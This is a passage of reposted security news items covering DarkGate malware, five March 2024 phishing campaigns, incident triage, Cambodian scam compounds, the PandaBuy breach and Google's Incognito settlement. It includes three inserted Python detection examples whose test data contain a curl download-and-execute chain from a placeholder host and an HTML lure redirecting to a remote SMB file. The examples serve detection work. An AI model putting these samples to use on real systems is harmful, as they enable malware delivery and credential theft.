Since January 2024, DarkGate has shifted to CAB and MSI formats, likely to evade detection.

DarkGate version 6.1.6 employs DLL side-loading for evasion, where a malicious DLL is loaded into legitimate applications (e.g., VLC, iTunesHelper) through a compromised MSI installer.

Dropped DarkGate payloads

The payload then decrypts itself using a key within a fake sqlite3.dll and drops a script into C:\temp, while decrypting again using a separate key and launching the final DarkGate payload.

Decrypted configuration reveals the command-and-control server.

The version also features a new configuration decryption routine using XOR encryption to hide C2 server information and other operational parameters, making it more difficult for signature-based detection.

DarkGate is a Malware-as-a-Service (MaaS) that steals information like usernames, CPU information, and anti-virus information from the victim device after gaining an initial foothold.

Decrypted C2 activity showing the version of Darkgate.

It then uses Living Off the Land Binaries (LOLBAS) like wscript.exe and cscript.exe to execute a VBS script.

BianLian ransomware attack chain using DarkGate.

Network traffic analysis can detect suspicious patterns such as downloads from unusual domains or suspicious Curl.exe activity, and YARA rules can detect the final payload on the infected device.
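The Curl.exe and script-host behaviour described above can also be hunted in process-creation telemetry. The following Python example is added here and is not code from the article or from EclecticIQ: it flags a host where curl.exe writes a file that cscript.exe or wscript.exe executes shortly afterwards, and raises the severity when a PING.exe connectivity check preceded the download. The event fields, host names, paths, URLs and the five-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (hosts, paths and URLs are made up).
EVENTS = [
    {"ts": "2024-04-02T09:14:01", "host": "WS-017",
     "image": r"C:\Windows\System32\PING.EXE",
     "cmd": r"ping -n 1 files.example.invalid"},
    {"ts": "2024-04-02T09:14:03", "host": "WS-017",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -s -o C:\temp\update.vbs http://files.example.invalid/u"},
    {"ts": "2024-04-02T09:14:05", "host": "WS-017",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe //nologo C:\temp\update.vbs"},
    # Benign: a zip is downloaded, then an unrelated inventory script runs.
    {"ts": "2024-04-02T09:20:00", "host": "WS-022",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -o C:\Users\dev\tool.zip https://dl.example.invalid/tool.zip"},
    {"ts": "2024-04-02T09:21:00", "host": "WS-022",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe C:\scripts\inventory.vbs"},
    # Download-then-execute with a quoted path and no connectivity check.
    {"ts": "2024-04-02T10:00:00", "host": "WS-030",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": r'curl.exe --output "C:\temp\inv 0402.vbs" http://files.example.invalid/i'},
    {"ts": "2024-04-02T10:00:20", "host": "WS-030",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\temp\inv 0402.vbs"'},
]

WINDOW = timedelta(minutes=5)          # assumed correlation window
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def curl_output_path(cmd):
    """File curl was told to write via -o/--output, lower-cased, or None."""
    m = re.search(r'\s(?:-o|--output)\s+(?:"([^"]+)"|(\S+))', cmd)
    return (m.group(1) or m.group(2)).lower() if m else None


def script_target(cmd):
    """First .vbs path on a script-host command line, lower-cased, or None."""
    m = re.search(r'(?:"([^"]+\.vbs)"|(\S+\.vbs))', cmd, re.IGNORECASE)
    return (m.group(1) or m.group(2)).lower() if m else None


def find_chains(events, window=WINDOW):
    """Correlate per host: [ping ->] curl writes X -> script host runs X."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)

    findings = []
    for host, evs in by_host.items():
        last_ping, downloads = None, []   # downloads: (time, path, pinged)
        for ev in evs:
            t = datetime.fromisoformat(ev["ts"])
            name = basename(ev["image"])
            if name == "ping.exe":
                last_ping = t
            elif name == "curl.exe":
                path = curl_output_path(ev["cmd"])
                if path:
                    pinged = last_ping is not None and t - last_ping <= window
                    downloads.append((t, path, pinged))
            elif name in SCRIPT_HOSTS:
                target = script_target(ev["cmd"])
                for dl_time, path, pinged in downloads:
                    if target == path and t - dl_time <= window:
                        findings.append({
                            "host": host, "script": path, "runner": name,
                            "downloaded": dl_time.isoformat(),
                            "executed": t.isoformat(),
                            "severity": "high" if pinged else "medium",
                        })
    return findings


if __name__ == "__main__":
    for finding in find_chains(EVENTS):
        print(finding)
```

Matching on the exact file path that curl wrote keeps the rule quiet on hosts where curl and script hosts are both used for unrelated administrative work.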

The IOCs include suspicious user agent strings, command and control (C2) server domains, payload downloader URLs with malicious zip files, and multiple file hashes, which can be used to identify infected systems, block malicious traffic, and improve threat detection.

The post DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Authentic8 launches Silo Shield Program to Protect High-Risk Communities in Partnership with CISA

Authentic8, provider of the leading OSINT research platform Silo for Research, today launched their Silo Shield Program to enhance online security for high-risk communities.

Also today, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) launched a webpage listing free tools and services to strengthen defenses of high-risk communities, including Authentic8’s new Silo Shield Program.

These “high-risk” communities — non-governmental organizations, journalists, and academics — face digital risks that are existential threats to their missions, as they are targeted by some of the world’s most capable advanced persistent threats (APTs).

The new Silo Shield Program enables eligible persons to apply for access to Authentic8’s Silo for Research platform, which provides a secure solution to collect publicly available information.

Securely collecting web-based information is essential for these groups to carry out research, investigations, and advocacy.

“In an era where adversaries threaten those striving for social change and transparency, Authentic8 is proud to launch the Silo Shield Program.

This pioneering initiative offers robust online protection for high-risk communities at the forefront of pushing boundaries and challenging the status quo.

While we have supported similar organizations for years, recent work with CISA prompted us to formalize and expand access to those at risk,” says Ramesh Rajagopal, CEO and co-founder of Authentic8.

High-risk communities eligible to apply to the Silo Shield Program include:

  • **Journalists** focusing on topics like security, transparency and global affairs who perform online research and may be targeted by adversaries as a part of their work.

  • Activists and non-profit groups are eligible for Silo Shield as they work to safeguard human rights, prevent abuse and effect justice, as they rely on online research to uncover and document abuses, legal violations and advocacy opportunities.

  • Academics in fields like security, political science, sociology and environmental studies, whose research on global issues demands access to information across geographical boundaries — often in restrictive environments — are eligible.

  • Humanitarian aid organizations, including those focusing on direct support, anti-corruption efforts and digital freedom are eligible for Silo Shield, as their efforts to compile evidence, vet suppliers and aid recipients, and communicate safely online are critical to their missions.

“Our commitment to high-risk communities is more than just a promise; it’s a mission to arm them with the tools they need to conduct their vital work securely and confidently.

We are proud to enable their access to global online resources without fear of adversary surveillance or compromise,” says Matt Ashburn, a former CIA cyber officer and White House NSC Director who now serves as Authentic8’s vice president of Customer Success.

Through the Joint Cyber Defense Collaborative (JCDC), Authentic8 collaborated with CISA on their High-Risk Communities Protection effort to elevate awareness of the cyber threats that high-risk communities experience and resources available to mitigate them.

CISA’s High-Risk Communities webpage serves as a one-stop-shop for cybersecurity guidance and free or discounted tools and resources that are tailored to meet the needs of high-risk organizations that want to improve their cybersecurity baseline.

For more information on the Silo Shield program or the Silo for Research digital investigations platform, visit https://authentic8.com.

Contact

Head of Strategic Initiatives

Abel Vandegrift

Authentic8

abel@authentic8.com

The post Authentic8 launches Silo Shield Program to Protect High-Risk Communities in Partnership with CISA appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

5 Major Phishing Campaigns in March 2024

March saw many notable phishing attacks, with criminals using new tactics and approaches to target unsuspecting victims.

It is time to explore five of the most noteworthy campaigns to better understand the current threat landscape.

Pay close attention to the details of these attacks to determine whether your organization may be vulnerable.

Attack Using SmbServer to Steal Victims’ Credentials

The month kicked off with an attack likely carried out by the infamous TA577 threat actor.

The campaign targeted victims’ credentials and began with a social engineering email, written in English or German, with the subject line “I sent a material your side last day, have you able to get it?”

Attached to the email was a ZIP archive containing a weaponized HTML file. From there, the attack unfolded the following way:

  1. The victim opened the HTML page, built on a 450-byte template.

  2. The page redirected the user to a file on an external server, leveraging impacket-smbserver via the SMB protocol.

  3. The attackers received the victim’s data: IP address, NTLM challenge data, Username, and computer name.

To view a real-world sample of this phishing campaign, use **this analysis session report** in the ANY.RUN sandbox.
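One check a mail gateway or analyst can apply to HTML attachments like the one described above, as an added example that is not part of the original article: parse the page and report any attribute or script that points at a file on a remote host (file://host/... or a UNC path), since opening such a reference is what makes Windows attempt SMB authentication. The sample pages, addresses and the internal-suffix allowlist are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# file://host/..., file:////host/... and \\host\share name a remote file
# server; file:///C:/... (empty host) is local and deliberately not matched.
REMOTE_FILE = re.compile(
    r'(?:file:(?:////|//|\\\\)|(?<![\\\w])\\{2,4})'
    r'([A-Za-z0-9][A-Za-z0-9.\-]*)[/\\]',
    re.IGNORECASE,
)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

# Constructed lure: an immediate redirect to a file on an outside address.
LURE = ('<html><head><meta http-equiv="refresh" '
        'content="0; url=file://203.0.113.45/share/doc.txt"></head>'
        '<body>Loading document...</body></html>')

# Constructed benign page: protocol-relative CDN link, local file link,
# and a link to an internal file server.
BENIGN = ('<html><body><img src="//cdn.example.com/logo.png">'
          '<a href="file:///C:/Users/Public/readme.txt">local copy</a>'
          '<a href="file://fs01.corp.example/hr/policy.pdf">policy</a>'
          '</body></html>')


class RemoteFileRefScanner(HTMLParser):
    """Collects remote file references from attributes and script bodies."""

    def __init__(self, internal_suffixes=()):
        super().__init__(convert_charrefs=True)
        # Suffixes such as ".corp.example" that count as internal (assumed).
        self.internal = tuple(s.lower() for s in internal_suffixes)
        self.findings = []
        self._in_script = False

    def _check(self, where, text):
        for m in REMOTE_FILE.finditer(text or ""):
            host = m.group(1).lower()
            if host in LOCAL_HOSTS or host.endswith(self.internal):
                continue
            self.findings.append({"where": where, "host": host})

    def handle_starttag(self, tag, attrs):
        self._in_script = (tag == "script")
        for name, value in attrs:          # value is None for bare attributes
            self._check(f"<{tag} {name}>", value)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._check("<script> body", data)


def scan_html(html, internal_suffixes=()):
    """Return a list of {'where', 'host'} findings for one HTML document."""
    scanner = RemoteFileRefScanner(internal_suffixes)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    print(scan_html(LURE))
    print(scan_html(BENIGN, internal_suffixes=(".corp.example",)))
```

A finding here pairs naturally with an egress rule: outbound SMB to the internet is rarely needed, so blocking it at the perimeter removes the channel even when a page slips through.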

Attack Utilizing Fake MS Outlook Login Pages

A fake Nokia login page shown in the ANY.RUN sandbox

Early in March, another phishing campaign combined a Telegram bot with phishing pages hosted on Cloudflare Workers.

The motivation here was to steal user login credentials by automatically mimicking the look and feel of their organizations’ MS Outlook login pages.

These pages incorporated several elements:

  • Base64 encoded background images and design elements sourced directly from Microsoft.

  • Common JavaScript libraries like popper.js, jQuery, and Bootstrap provided a familiar user experience.

  • The victim’s company logo was fetched from the Clearbit Logo service.

The attackers transmitted the victim’s login information to a Telegram bot. The user was then redirected to a legitimate Microsoft Outlook page.

An actual example of the attack detonated and thoroughly followed through with a test set of credentials can be accessed in the ANY.RUN sandbox.

Attack Targeting Users in Latin America

Attack Targeting Users

In March, one of the geo-specific campaigns was targeted against victims in the LATAM region. In one instance, the attackers impersonated Colombian government agencies as part of their spam emails.

The messages were accompanied by PDFs accusing recipients of traffic violations or other legal issues. From there, the attack went as follows:

  1. The user opened a PDF and downloaded an archive.

  2. The archive contained a VBS script.

  3. Upon execution, the script ran a PowerShell script.

  4. This PowerShell script fetched the final payload from a legitimate storage service.

The final payload was one of several remote access trojans (RATs): AsyncRAT, NjRAT, and Remcos.

See the entire execution chain of the attack, resulting in NjRAT infection, in a sandbox.

Attack Abusing AWS to Drop STRRAT

ANY.RUN showing the Github connection used for downloading STRRAT

Using legitimate services, such as AWS and Github to store payloads, this phishing campaign once again relied on social engineering.

Victims received emails that encouraged them to verify payment information by clicking a button, leading to the following:

  1. By clicking the button, victims downloaded a malicious JAR file disguised as a payment invoice.

  2. After launching, the file employed a PowerShell command to run two more JAR files.

  3. The final stage involved VCURMS or STRRAT malware being pulled from Github or AWS and infecting the victim’s system.

To see an example of STRRAT being downloaded from Github and collect this malware’s configuration, use this analysis session in ANY.RUN.

Attack Exploiting TikTok and Google AMP

Phishing Page

The latest phishing campaign on this list employed several legitimate services simultaneously to get users to enter their credentials. It used a chain of redirects, starting from TikTok and ending with Cloudflare.

Here is a detailed overview of the attack:

  1. A TikTok link that embeds a Google AMP external address within the URI “&target=” parameter triggers a redirect.

  2. Google AMP then disguised a hidden address, which led to a URL Shortener Service. The destination domain address contained Unicode characters to mask the redirection target.

  3. The URL shortener service redirected the victim’s browser to Cloudflare, which is used to host the phishing page.

The page featured a form containing various encrypted code elements that were gradually decrypted and assembled during browser rendering. It also blocked right-click interactions, making element inspection difficult.

After form submission, the victim’s stolen data got transmitted via an HTTP POST request to the attackers.

To get an inside look into this campaign, refer to this analysis session.
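The redirect chain described above can be unwrapped statically, before anyone clicks the link. The following Python code is an added example, not part of the original article: it follows URLs nested in query parameters (such as `target=`) and in Google AMP `/amp/s/` paths, lists every host in the chain, and flags hosts that contain non-ASCII characters or punycode labels. The sample link, its placeholder path and the `.invalid` host are constructed; a URL shortener hop cannot be resolved without a network request, so the chain stops there.

```python
from urllib.parse import urlsplit, parse_qsl, unquote, quote

MAX_HOPS = 8  # stop on pathological nesting

# Constructed sample: the final host contains a Cyrillic "o" (U+043E).
INNER = "https://sh\u043ert.example.invalid/abc"
AMP = "https://www.google.com/amp/s/" + INNER[len("https://"):]
SAMPLE = ("https://www.tiktok.com/placeholder?lang=en&target="
          + quote(AMP, safe=""))


def embedded_url(url):
    """Return (carrier, inner_url) for a URL nested inside `url`, else None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()

    # 1) Google AMP viewer form: /amp/s/<host>/<path>; "s/" marks https.
    is_google = host == "google.com" or host.endswith(".google.com")
    if is_google and parts.path.startswith("/amp/"):
        rest = parts.path[len("/amp/"):]
        scheme = "http"
        if rest.startswith("s/"):
            scheme, rest = "https", rest[2:]
        if rest:
            inner = f"{scheme}://{rest}"
            return "amp-path", inner + (f"?{parts.query}" if parts.query else "")

    # 2) Any query parameter whose value is itself an absolute URL.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        for candidate in (value, unquote(value)):  # second pass: double-encoded
            if candidate.lower().startswith(("http://", "https://")):
                return f"param:{key}", candidate
    return None


def host_flags(host):
    """Flags for host names that can visually mask the real destination."""
    flags = []
    if not host.isascii():
        flags.append("non-ascii-host")
    if any(label.startswith("xn--") for label in host.split(".")):
        flags.append("punycode-host")
    return flags


def unwrap(url):
    """Follow nested URLs and summarise the chain of hosts and carriers."""
    chain, seen, carrier = [], set(), "start"
    while url and url not in seen and len(chain) < MAX_HOPS:
        seen.add(url)
        host = (urlsplit(url).hostname or "").lower()
        chain.append({"via": carrier, "host": host, "flags": host_flags(host)})
        nxt = embedded_url(url)
        carrier, url = nxt if nxt else (None, None)

    flags = sorted({f for hop in chain for f in hop["flags"]})
    if len(chain) >= 3:  # two or more redirectors before the destination
        flags.append("nested-redirects")
    return {"hosts": [hop["host"] for hop in chain],
            "via": [hop["via"] for hop in chain],
            "flags": flags}


if __name__ == "__main__":
    print(unwrap(SAMPLE))
    print(unwrap("https://www.example.org/search?q=redirect+chains&page=2"))
```

Scoring on the last host in the chain rather than the first is the point: the first hop belongs to a trusted service, which is why reputation checks on the visible link pass.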

Analyze Phishing Campaigns in ANY.RUN

ANY.RUN is a cloud sandbox for advanced analysis of malware and phishing attacks.

The service provides a fully interactive virtual environment where you can study the threat and interact with it and the system.

For instance, in the case of phishing, it can help you complete steps requiring human interaction to understand the entire chain of attack.

The sandbox also lets you easily monitor malicious network and registry activity, track and examine processes, extract indicators of compromise, and download threat reports.

The post 5 Major Phishing Campaigns in March 2024 appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

4 Incident Triage Best Practices for Your Organization in 2024

Maintaining uninterrupted services is vital for any organization.

The backbone of ensuring this continuous uptime lies in the Incident Management process. Incident triage is a significant component of this process.

It enables organizations to prioritize and address potential incidents efficiently.

In this article, we’ll look into the elements of incident triage and outline best practices to streamline your organization’s incident response.

Incidents, ranging from minor glitches to critical outages, can disrupt operations and impact customer experience.

To mitigate these disruptions effectively, organizations must implement active Incident Management processes.

By identifying and addressing issues, organizations can minimize downtime, uphold service reliability, and safeguard their reputation.

How Incident Triage Works

Incident triage starts the moment a potential issue arises, prompting responders to assess its severity and determine the appropriate course of action.

This initial evaluation distinguishes between mere anomalies and genuine incidents, guiding subsequent response efforts.

So, through meticulous analysis and classification, organizations can optimize resource allocation and speed up incident resolution.

The Incident Lifecycle

Incident Detection & Classification

The first step in incident triage involves detecting and accurately classifying incoming alerts. Establishing predefined data fields and event tags facilitates automated classification, reducing manual intervention and response times.

Moreover, implementing deduplication rules prevents notification overload, ensuring that responders focus on unique incidents.

Furnishing essential details and filtering out irrelevant information also helps organizations streamline the triage process and enhance operational efficiency.

Incident Alerting

Effective incident alerting hinges on delivering timely notifications for actionable events while mitigating alert fatigue.

Configuring deduplication and suppression rules prevents redundant alerts, enabling responders to prioritize critical incidents.

So, by optimizing alerting mechanisms, organizations cultivate a responsive incident management ecosystem conducive to swift resolution and minimal service disruption.

Incident Prioritization

Prioritizing incidents based on their impact and urgency is paramount for efficient triage and resource allocation.

Automated prioritization mechanisms, aligned with service and customer impact metrics, expedite incident handling and resolution.

So, an organization that equips responders with clear directives and contextual insights will optimize incident triage workflows and uphold service excellence.

Triage and Collaboration

Logical collaboration and streamlined communication are indispensable for effective incident triage and resolution.

Configuring incident routing and escalation policies ensures that incidents reach the appropriate responders promptly.

Leveraging platform-specific collaboration tools like Radiants Security will foster real-time communication and knowledge sharing, enhancing team cohesion and decision-making agility.

Incident Communication

Transparent and active communication is essential for managing stakeholder expectations and maintaining trust during incidents.

Automating communication updates and providing stakeholders with real-time insights fosters transparency and accountability.

Furthermore, maintaining a public status page facilitates active customer engagement and augments organizational resilience to disruptions.

Incident Resolution

Automation and documentation are cornerstones of efficient incident resolution processes.

Integrating incident management tools enables the execution of remedial actions, minimizing manual intervention and accelerating resolution.

So, documenting resolution efforts and maintaining comprehensive incident records empower organizations to derive insights and refine response strategies iteratively.

Incident Review & Remediation

Post-incident review and remediation are integral to continuous improvement and resilience enhancement.

Collaborative incident reviews, coupled with root-cause analysis, explain underlying issues and inform preventive measures.

Embracing a blameless culture fosters open dialogue and knowledge sharing, fostering a culture of continuous learning and innovation.

Extending Incident Triage Practices

As organizations innovate, so do the challenges they face in incident management.

To stay ahead of the curve, continually refining and expanding incident triage practices is essential.

Here are additional strategies to augment your incident response capabilities:

1. Advanced Automation

Harness the power of artificial intelligence and machine learning to automate complex incident detection and resolution tasks.

Implement predictive analytics algorithms to anticipate potential issues before they escalate, enabling active intervention and risk mitigation.

Leveraging cutting-edge automation technologies will enable organizations to enhance operational efficiency and resilience in the face of conventional threats.

2. Cross-Functional Training

Provide cross-functional training to incident response teams to foster a culture of collaboration and knowledge sharing.

Equip team members with an understanding of organizational systems and processes, enabling them to collaborate effectively across departments during incident triage and resolution.

By breaking down silos and promoting interdisciplinary cooperation, organizations can optimize incident response efforts and minimize disruptions.

3. Continuous Evaluation and Optimization

Assess incident triage processes and performance metrics regularly to identify areas for improvement.

Solicit feedback from frontline responders and stakeholders to gain insights into pain points and emerging challenges.

Iterate incident response workflows based on lessons learned from past incidents and industry best practices.

By embracing a culture of continuous evaluation and optimization, organizations can adapt and evolve their incident management capabilities to meet threats and business requirements.

4. Stakeholder Engagement

Engage stakeholders proactively throughout the incident triage and resolution process to manage expectations and maintain transparency.

Provide regular updates on incident status and mitigation efforts to internal teams, customers, and other relevant stakeholders.

Solicit stakeholder input and feedback to ensure that incident response efforts align with business priorities and customer needs.

Conclusion

Mastering incident triage is essential for organizations seeking to enhance their Incident Management capabilities and boost resilience against potential disruptions.

Organizations can effectively identify, prioritize, and resolve incidents by implementing best practices and leveraging advanced technologies like Radiants Security, ensuring uninterrupted service delivery and maintaining customer trust in today’s digital space.

The post 4 Incident Triage Best Practices for Your Organization in 2024 appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Indian Govt Rescues 250 Citizens Trapped In Cambodia Forced Into Cyber-Slavery

A massive cyber fraud operation targeting Indians in Cambodia has emerged, with an estimated Rs 500 crore stolen in six months.

Over 5,000 Indian nationals are reportedly being held against their will and forced to participate in the elaborate scheme.

A high-level meeting was convened immediately, bringing together officials from the Ministry of External Affairs (MEA), the Ministry of Electronics and Information Technology (Meity), the Indian Cyber Crime Coordination Centre (I4C), and security experts to formulate a rescue strategy.

“The agenda of their meeting was to discuss the organized racket and bring back those who are trapped there. Data shows that Rs 500 crore has been lost (to cyber fraud originating in Cambodia) in India in the last six months,”.

250 Citizens Trapped In Cambodia

They also added that the agents target victims, mainly from southern India, with offers of data entry jobs.

Once in Cambodia, passports are confiscated, and victims are compelled into cyber fraud, including impersonating law enforcement for extortion.

On December 30, the Rourkela Police in Odisha arrested eight people who facilitated travel to Cambodia.

According to Dr. Arathi Krishna, Deputy Chairman of the Non-Resident Indian Forum of the Government of Karnataka (NRIFK), three Karnataka residents trapped in a Cambodian cyber fraud scheme have been rescued with the help of the Ministry of External Affairs (MEA).

Family members alerted NRIFK about the struggle.

Lured by promises of data entry jobs, the men were forced to participate in cyber scams.

Dr. Krishna commended the collaborative effort between NRIFK, the MEA, and the Indian embassy in securing their release.

The rescued individuals estimate that around 200 others from the region are still trapped.

Stephen, one of the rescued men, explained the ordeal:

An agent in Mangalore offered him a seemingly legitimate IT job in Cambodia.

Stephen and his companions were tricked with fake tourist visas and deceptive interviews.

“We had to create fake social media accounts with photographs of women sourced from different platforms. But we were told to be careful while picking these photos. So a South Indian girl’s profile would be used to trap someone in the North so that it did not raise any suspicion. We had targets and if we didn’t meet those, they would not give us food or allow us into our rooms. Finally, after a month and a half, I contacted my family and they took the help of some local politicians to speak to the embassy,” said Stephen.

Rourkela Sub Divisional Police Officer Upasana Padhi explained the agents’ tactics.

They lured men with job prospects and then forced them to work for fraudulent companies upon arrival.

Passports were confiscated, and victims were subjected to 12-hour workdays under the threat of violence.

Authorities are actively identifying and working to repatriate more victims.

Padhi revealed details of the scams, which also involved cryptocurrency and fake stock investments facilitated by fraudulent online platforms.

The Ministry of External Affairs (MEA) addressed media inquiries concerning Indian nationals facing difficulties in Cambodia. Spokesperson Shri Randhir Jaiswal provided a statement

The post Indian Govt Rescues 250 Citizens Trapped In Cambodia Forced Into Cyber-Slavery appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Swalwell for Congress Campaign Partners with Wolfsbane.ai to Protect Against AI-Generated Cloning

Today, Congressman Eric Swalwell, CA-14, announced that he has partnered with Wolfsbane.ai to help prevent his 2024 election campaign content from being used to create AI clones and deepfakes.

Wolfsbane.ai will use its patent-pending technology to encode Rep. Swalwell’s campaign videos and audio with a countermeasure that makes it difficult to create AI clones with that content.

Rep. Swalwell is the first political figure to use Wolfsbane.ai and take an active step to ensure that his campaign content is not used to create clones and fakes that can be used for misinformation. “Ensuring the integrity of our democratic process is of paramount importance,” said Swalwell.

“Embracing cutting-edge tools such as Wolfsbane.ai to prevent deepfakes is not just an option; it’s a necessity in safeguarding elections against fraud and misinformation.”

Rep. Swalwell is ranking member of the Cybersecurity and Infrastructure Protection Congressional Subcommittee where he has stressed the dangers of AI-generated deepfakes in spreading election misinformation.

Rep. Swalwell is not merely talking about preventing deepfakes, he is taking active steps to ensure that his own voice and likeness are protected using the latest technology advancements. “AI is a potent technology,” said Swalwell.

“If used irresponsibly, it can hijack the likeness and voice of public figures to undermine their credibility and spread disinformation. Wolfsbane.ai will mitigate the risks of this happening to me.”

One of the advancements in the fight against AI deepfakes is Wolfsbane.ai. Wolfsbane.ai is a recently launched service offered by Play Cubed, a company founded by content protection pioneers Randy Saaf and Octavio Herrera as well as Fazri Zubair and Noah Edelman.

Wolfsbane.ai allows customers to protect their content, voice, IP and identity from unauthorized AI cloning and deepfakes. Before publishing any content, Wolfsbane.ai customers can use a simple interface to upload and quickly process it; once done that content is protected by the Wolfsbane countermeasure and the user can publish their content with peace-of-mind.

Wolfsbane.ai’s patent-pending encoding technology offers a robust defense, designed to effectively combat a wide spectrum of AI cloning tools.

Wolfsbane.ai is being used by music artists, entertainment companies, content creators, and individuals but the company is very focused on working with campaigns as well as government officials.

“We are proud to be working with Rep. Swalwell’s campaign” said Play Cubed CEO Randy Saaf. “We think our technology can be an effective tool in the fight against AI fakes during this important election year.”

About Swalwell for Congress:

Elected in 2012 to Congress, representing the East Bay in Northern California, Eric Swalwell served eight years on the House Intelligence Committee where he was the chairman and ranking member overseeing the CIA.

On the Intelligence Committee, Eric helped lead the House Investigation into Russia’s interference in the 2016 election, and later, the first and second impeachments of Donald Trump.

As a member of the House Democrats’ leadership team, Eric was on the House Floor on January 6. A week after the attack, Eric was appointed as a House Impeachment Manager for the former president’s Senate trial.

Eric currently serves on the House Judiciary and Homeland Security Committees. He is also Chairman Emeritus and founder of Future Forum, a group of young Democratic members focused on issues and opportunities for millennial Americans.

Eric is also founder and co-chair of the bipartisan Critical Materials Caucus, and Personalized Medicine Caucus. Every day Eric strives to make sure if you work hard it adds up to doing better for yourself and dreaming bigger for your family.

About Play Cubed/Wolfsbane.ai

Play Cubed provides AI Content Protection services via its patent-pending technology Wolfsbane.ai.

Play Cubed is founded by Randy Saaf, Octavio Herrera, Fazri Zubair, and Noah Edelman. Our team has been together for over 8 years, with Randy and Octavio having worked together for over 20 years. Randy and Octavio are proven entrepreneurs with two successful exits valuing nearly $400M.

Randy and Octavio are content protection pioneers, having co-founded P2P anti-piracy provider MediaDefender in 2000. MediaDefender was used by every major music label and movie studio and was acquired by ARTISTDirect in 2005.

The Play Cubed team also has a successful history of developing enabling technologies used by top companies such as Major League Baseball, NBA, CBS, ESPN, Mattel, Universal Music, Sony Music, Lionsgate, and many more.

Contact

Cofounder

Octavio Herrera

Play Cubed

contact@playcubed.io

The post Swalwell for Congress Campaign Partners with Wolfsbane.ai to Protect Against AI-Generated Cloning appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

PandaBuy Data Breach: 1.3 Million Customers Data Leaked

PandaBuy, a popular online shopping platform, has been the victim of a significant data breach.

This breach has resulted in the leak of personal information belonging to more than 1.3 million customers.

The incident has raised serious concerns about cybersecurity practices and consumer data protection in the digital age.

The breach was first brought to light by members of the BreachForums, an infamous cybercrime forum.

Two threat actors, known by pseudonyms ‘Sanggiero’ and ‘IntelBroker,’ claimed responsibility for the hack.

They alleged that they exploited several critical vulnerabilities in PandaBuy’s platform and API to gain unauthorized access to the company’s database.

The leaked data is extensive and includes sensitive personal information such as User IDs, first and last names, phone numbers, email addresses, login IPs, order details, home addresses, zip codes, and countries of residence.

According to the announcement on BreachForums, the dataset comprises over 3 million rows of data, indicating the scale and severity of the breach.

Evidence and Confirmation

To substantiate their claims, Sanggiero published a sample of the stolen data on the cybercrime forum and offered it for sale.

“@Sanggiero and @IntelBroker breached the website.” reads the announcement published by BreachForums.

This action has confirmed the breach and exposed the affected customers to potential further cybercrimes, including identity theft and phishing attacks.

Troy Hunt, the founder of Have I Been Pwned (HIBP), a website that allows internet users to check whether data breaches have compromised their personal information, tweeted confirming the validity of 1.3 million email addresses from the leaked dataset.

Anyone seen a statement from Pandabuy on this? Apparently they're aware, but I'm not finding anything [https://t.co/AtkAI7f6Hn](https://t.co/AtkAI7f6Hn)

— Troy Hunt (@troyhunt) [April 1, 2024](https://twitter.com/troyhunt/status/1774704266500043067?ref_src=twsrc%5Etfw)

Hunt has since added these addresses to HIBP, enabling individuals to check if the breach impacted them.

PandaBuy’s Response and Controversy

PandaBuy has not officially acknowledged the security breach.

Troy Hunt confirmed allegations that the company might be attempting to downplay or hide the incident.

Speaking on a Discord channel, a company representative claimed that the security breach occurred in the past and insisted that no data breach had occurred this year.

This statement has done little to assuage the concerns of PandaBuy customers and cybersecurity experts.

This incident is a stark reminder of the ever-present threat of cyberattacks and the importance of robust cybersecurity measures.

Companies, especially those handling vast amounts of consumer data, must prioritize the security of their platforms to protect against such breaches.

For consumers, the breach underscores the need for vigilance and the adoption of best practices for digital security, such as using strong, unique passwords and being cautious of phishing attempts.

The post PandaBuy Data Breach: 1.3 Million Customers Data Leaked appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Google to Delete Billions of User’s Personal Data Collected Via Chrome Browser

Google has agreed to delete billions of data records that reflect the private browsing activities of users.

This decision comes as part of a settlement for a lawsuit that accused the tech giant of improperly tracking the web-browsing habits of users who believed they were browsing the internet privately using Chrome’s ‘Incognito’ mode.

Settlement of the ‘Incognito’ Lawsuit

The lawsuit, originally filed in 2020, alleged that Google misrepresented the kind of data it collects from users who browsed the internet via ‘Incognito’ mode in Chrome.

Google agreed to settle the suit late last year, and the settlement terms were disclosed in a filing on Monday.

As part of the settlement, Google must delete “billions of data records” that reflect the private browsing activities of users in the class action suit.

In addition to the data deletion, Google will update its disclosure to inform users about what data it collects each time a user initiates a private browsing session.

Google has already started implementing these changes.

As part of the settlement, Google will also let private browsing users block third-party cookies for the next five years.

